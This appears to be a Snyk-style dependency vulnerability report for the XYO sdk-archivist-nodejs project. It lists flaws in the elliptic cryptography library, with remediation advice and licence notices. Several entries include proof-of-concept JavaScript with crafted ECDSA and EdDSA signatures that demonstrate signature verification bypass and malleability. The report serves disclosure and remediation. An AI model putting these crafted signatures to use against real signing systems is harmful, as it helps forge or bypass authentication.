Vulnerabilities

7 via 7 paths

Dependencies

204

Source

GitHub

Commit

9e4a64e6

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 7
  • 2
Severity
  • 5
  • 1
  • 3
Status
  • 9
  • 0
  • 0

critical severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to an anomaly in the _truncateToN function. An attacker can cause legitimate transactions or communications to be incorrectly flagged as invalid by exploiting the signature verification process when the hash contains at least four leading 0 bytes, and the order of the elliptic curve's base point is smaller than the hash.

In some situations, a private key exposure is possible. This can happen when an attacker knows a faulty and the corresponding correct signature for the same message.

Note: Although the vector for exploitation of this vulnerability was restricted with the release of versions 6.6.0 and 6.6.1, it remains possible to generate invalid signatures in some cases in those releases as well.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.7
var hash = require('hash.js');
var BN = require('bn.js');
var toArray = elliptic.utils.toArray;

var ec = new elliptic.ec('p192');
var msg = '343236343739373234';
var sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b';
// Same public key just in different formats
var pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723';
var pkPem = '-----BEGIN PUBLIC KEY-----\nMEkwEwYHKoZIzj0CAQYIKoZIzj0DAQEDMgAEzTWgsY7rj82H/wGXgAEoKHRfBG54\nXeuigVDeG+bLQ3ZSMAa+/zD/CbQEkSXO0pcj\n-----END PUBLIC KEY-----\n';

// Create hash
var hashArray = hash.sha256().update(toArray(msg, 'hex')).digest();
// Convert array to string (just for showcase of the leading zeros)
var hashStr = Array.from(hashArray, function(byte) {
  return ('0' + (byte & 0xFF).toString(16)).slice(-2);
}).join('');
var hMsg = new BN(hashArray, 'hex');
// Hashed message contains 4 leading zeros bytes
console.log('sha256 hash(str): ' + hashStr);
// Due to using BN bitLength lib it does not calculate the bit length correctly (should be 32 since it is a sha256 hash)
console.log('Byte len of sha256 hash: ' + hMsg.byteLength());
console.log('sha256 hash(BN): ' + hMsg.toString(16));

// Due to the shift of the message to be within the order of the curve the delta computation is invalid
var pubKey = ec.keyFromPublic(toArray(pk, 'hex'));
console.log('Valid signature: ' + pubKey.verify(hashStr, sig));

// You can check that this hash should validate by consolidating openssl
const fs = require('fs');
fs.writeFile('msg.bin', new BN(msg, 16).toBuffer(), (err) => {
  if (err) throw err;
});
fs.writeFile('sig.bin', new BN(sig, 16).toBuffer(), (err) => {
  if (err) throw err;
});
fs.writeFile('cert.pem', pkPem, (err) => {
  if (err) throw err;
});

// To verify the correctness of the message signature and key one can run:
// openssl dgst -sha256 -verify cert.pem -signature sig.bin msg.bin
// Or run this python script
/*
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec


msg = '343236343739373234'
sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b'
pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723'

p192 = ec.SECP192R1()
pk = ec.EllipticCurvePublicKey.from_encoded_point(p192, bytes.fromhex(pk))
pk.verify(bytes.fromhex(sig), bytes.fromhex(msg), ec.ECDSA(hashes.SHA256()))
*/

Remediation

There is no fixed version for elliptic.

References

critical severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to a missing signature length check in the EDDSA signature process. An attacker can manipulate the signature by appending or removing zero-valued bytes.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.6
var eddsa = elliptic.eddsa;

var ed25519 = new eddsa('ed25519');
var key = ed25519.keyFromPublic('7d4d0e7f6153a69b6242b522abbee685fda4420f8834b108c3bdae369ef549fa', 'hex');

// [tcId 37] appending 0 byte to signature
var msg = '54657374';
var sig =  '7c38e026f29e14aabd059a0f2db8b0cd783040609a8be684db12f82a27774ab07a9155711ecfaf7f99f277bad0c6ae7e39d4eef676573336a5c51eb6f946b30d00';
console.log(key.verify(msg, sig));

// [tcId 38] removing 0 byte from signature
msg = '546573743137';
sig =  '93de3ca252426c95f735cb9edd92e83321ac62372d5aa5b379786bae111ab6b17251330e8f9a7c30d6993137c596007d7b001409287535ac4804e662bc58a3';
console.log(key.verify(msg, sig));

Remediation

Upgrade elliptic to version 6.5.7 or higher.

References

critical severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to the allowance of BER-encoded signatures. An attacker can manipulate the ECDSA signatures by exploiting the signature malleability.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.6
var hash = require('hash.js');
var toArray = elliptic.utils.toArray;

var ec = new elliptic.ec('p521');

// [tcId 7] length of sequence [r, s] contains a leading 0
var msg = '313233343030';
var sig = '3082008602414e4223ee43e8cb89de3b1339ffc279e582f82c7ab0f71bbde43dbe374ac75ffbef29acdf8e70750b9a04f66fda48351de7bbfd515720b0ec5cd736f9b73bdf8645024128b5d0926a4172b349b0fd2e929487a5edb94b142df923a697e7446acdacdba0a029e43d69111174dba2fe747122709a69ce69d5285e174a01a93022fea8318ac1';
var pk = '04005c6457ec088d532f482093965ae53ccd07e556ed59e2af945cd8c7a95c1c644f8a56a8a8a3cd77392ddd861e8a924dac99c69069093bd52a52fa6c56004a074508007878d6d42e4b4dd1e9c0696cb3e19f63033c3db4e60d473259b3ebe079aaf0a986ee6177f8217a78c68b813f7e149a4e56fd9562c07fed3d895942d7d101cb83f6';

var hashMsg = hash.sha512().update(toArray(msg, 'hex')).digest();
var pubKey = ec.keyFromPublic(pk, 'hex');
console.log('Valid signature: ' + pubKey.verify(hashMsg, sig));

Remediation

Upgrade elliptic to version 6.5.7 or higher.

References

critical severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to a missing check for whether the leading bit of r and s is zero. An attacker can manipulate the ECDSA signature by exploiting this oversight.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.6
var hash = require('hash.js');
var toArray = elliptic.utils.toArray;

var ec = new elliptic.ec('secp256k1');

// [tcId 6] Legacy: ASN encoding of r misses leading 0
var msg = '313233343030';
var sig = '30440220813ef79ccefa9a56f7ba805f0e478584fe5f0dd5f567bc09b5123ccbc983236502206ff18a52dcc0336f7af62400a6dd9b810732baf1ff758000d6f613a556eb31ba';
var pk = '04b838ff44e5bc177bf21189d0766082fc9d843226887fc9760371100b7ee20a6ff0c9d75bfba7b31a6bca1974496eeb56de357071955d83c4b1badaa0b21832e9';

var hashMsg = hash.sha256().update(toArray(msg, 'hex')).digest();
var pubKey = ec.keyFromPublic(pk, 'hex');
console.log('Valid signature: ' + pubKey.verify(hashMsg, sig));

Remediation

Upgrade elliptic to version 6.5.7 or higher.

References

critical severity

Information Exposure

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Information Exposure due to the sign function which allows an attacker to extract the private key from an ECDSA signature by signing a malformed input. A single maliciously crafted signed message can enable full key extraction for any previously known message-signature pair.

Remediation

Upgrade elliptic to version 6.6.1 or higher.

References

high severity

Improper Verification of Cryptographic Signature

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to improper range validation of the S value in the verify function, allowing the usage of an invalid signature.

Note:

This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.

Remediation

Upgrade elliptic to version 6.5.6 or higher.

References

medium severity

Cryptographic Issues

  • Vulnerable module: elliptic
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 elliptic@6.5.3
    Remediation: Upgrade to @xyo-network/sdk-core-nodejs@0.71.6.

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed.

Remediation

Upgrade elliptic to version 6.5.4 or higher.

References

medium severity

LGPL-3.0 license

  • Module: @xyo-network/sdk-base-nodejs
  • Introduced through: @xyo-network/sdk-base-nodejs@0.7.6 and @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-base-nodejs@0.7.6
  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4 @xyo-network/sdk-base-nodejs@0.7.7

LGPL-3.0 license

medium severity

LGPL-3.0 license

  • Module: @xyo-network/sdk-core-nodejs
  • Introduced through: @xyo-network/sdk-core-nodejs@0.71.4

Detailed paths

  • Introduced through: @xyo-network/sdk-archivist-nodejs@XYOracleNetwork/sdk-archivist-nodejs#9e4a64e62fd82ab934bbdc7f99266418f6c8c74a @xyo-network/sdk-core-nodejs@0.71.4

LGPL-3.0 license